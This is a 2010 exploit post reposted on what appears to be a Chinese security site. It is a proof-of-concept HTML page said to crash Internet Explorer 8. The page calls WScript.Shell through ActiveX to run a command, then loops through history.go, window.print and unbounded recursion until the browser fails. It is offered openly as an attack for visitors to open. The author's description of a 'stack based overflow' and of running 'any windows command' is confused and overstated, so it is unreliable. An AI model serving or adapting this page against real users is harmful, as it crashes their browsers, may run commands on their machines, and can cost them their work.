首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
来源:informationhacker08@gmail.com 作者:Tripathi 发布时间:2010-02-22  

                     =======================================================================

                      Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
                     =======================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company       aksitservices

# Credit by Asheesh Anaconda


#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)


#Background

Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

#Vulnerability
This bug is a typical result of multitudinous  loop. 
The flaw exists within "history go" ActiveX control which contains
stack based overflow conditions.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact

Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
your system unaccessible,your work if any   might be lost

#Proof of concept
copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

========================================================================================================================

                                                           asheesh.html
========================================================================================================================
<html>
<title>asheesh kumar mani tripathi</title>

<head>
<script type="text/javascript">
function sucks()
{

var shell=new ActiveXObject("WScript.Shell");
shell.Run("ipconfig", 1);

}

function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>

</html>


========================================================================================================================

 


#If you have any questions, comments, or concerns, feel free to contact me.

 

 

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox 3.6 (Multitudi
·NovaPlayer 1.0 (.mp3) Local De
·Browser address bar characters
·Wireshark 1.2.5 LWRES getaddrb
·Hyleos ChemView v1.9.5.1 Activ
·Internet Explorer (6/7) Remote
·Open & Compact FTPd Pre-Authen
·Ollydbg 2.00 Beta1 Local Buffe
·CastRipper 2.50.70 (.asx) Play
·Apple Iphone/Ipod - My DBLite
·Radasm .rap file local buffer
·Easy~Ftp Server v1.7.0.2 Post-
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved